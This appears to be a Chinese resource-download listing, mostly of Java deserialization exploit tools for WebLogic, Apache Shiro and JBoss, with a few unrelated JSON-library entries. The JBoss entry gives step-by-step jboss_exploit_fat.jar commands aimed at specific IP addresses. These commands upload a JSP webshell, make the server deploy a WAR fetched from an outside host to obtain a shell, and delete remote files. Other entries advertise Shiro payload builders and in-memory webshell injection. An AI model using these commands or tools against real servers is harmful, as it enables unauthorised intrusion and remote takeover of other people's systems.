文件中有两个patch需要打,然后有测试工具和补丁教程可以参看
2021-04-11 21:48:22 82.24MB weblogic 补丁 反序列
1
WebLogic T3 反序列化绕过漏洞[CVE-2018-2893]复现
2021-04-10 12:00:13 1.06MB WebLogic CVE-2018-2893
1
@JsonIgnore 此注解用于属性上,作用是进行JSON操作时忽略该属性。 @JsonFormat 此注解用于属性上,作用是把Date类型直接转化为想要的格式,如@JsonFormat(pattern = "yyyy-MM-dd HH-mm-ss")。 @JsonProperty 此注解用于属性上,作用是把该属性的名称序列化为另外一个名称,如把trueName属性序列化为name,@JsonProperty("name")。
2021-04-08 09:05:58 14KB json
1
文件目录: * 被攻击网站源码(一个shrio-demo):samples-web-1.2.4.war * 反序列化工具(神器):ysoserial-0.0.6-SNAPSHOT-all.jar* * Payload构造小工具(将反序列化payload进行AES加密、Base64编码):poc.py
2021-04-07 22:49:53 49.65MB shrio 反序列化攻击 ysoserial samples-web.war
1
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
2021-04-01 14:43:07 4.92MB jbss 网安 反序列化 jml
1
Java反序列化漏洞利用工具
2021-03-25 17:00:19 1.75MB java 反序列
1
jdk1.8的src,扩展了sun.reflect,unsafe。
2021-03-23 19:00:13 39.59MB java 反序列化 src源码
1
四郎检查 3.0增加了一些回显有效载荷,增加了基于过滤器(需要对冰蝎客户端pageContext进行改造)和servlet(部分环境需要把参数据进行URL转码)内存冰蝎的支持。 2.0增加了回显,及100个键,20个键的扫描选项,利用了burp内置的dnslog api(协作者)基于ysoserial的小工具URLDNS进行DNS查询验证此漏洞! #release中提供下载
2021-03-21 17:09:53 149KB Java
1
支持Model转换为Json String,Json String转换为Model
2021-03-11 21:01:13 56KB c++ json
1
进行shiro漏洞扫描 教程:https://blog.csdn.net/qq_41901122/article/details/107107237
2021-03-03 17:00:07 50.07MB ShiroExploit Shiro反序列化漏洞 Shiro
1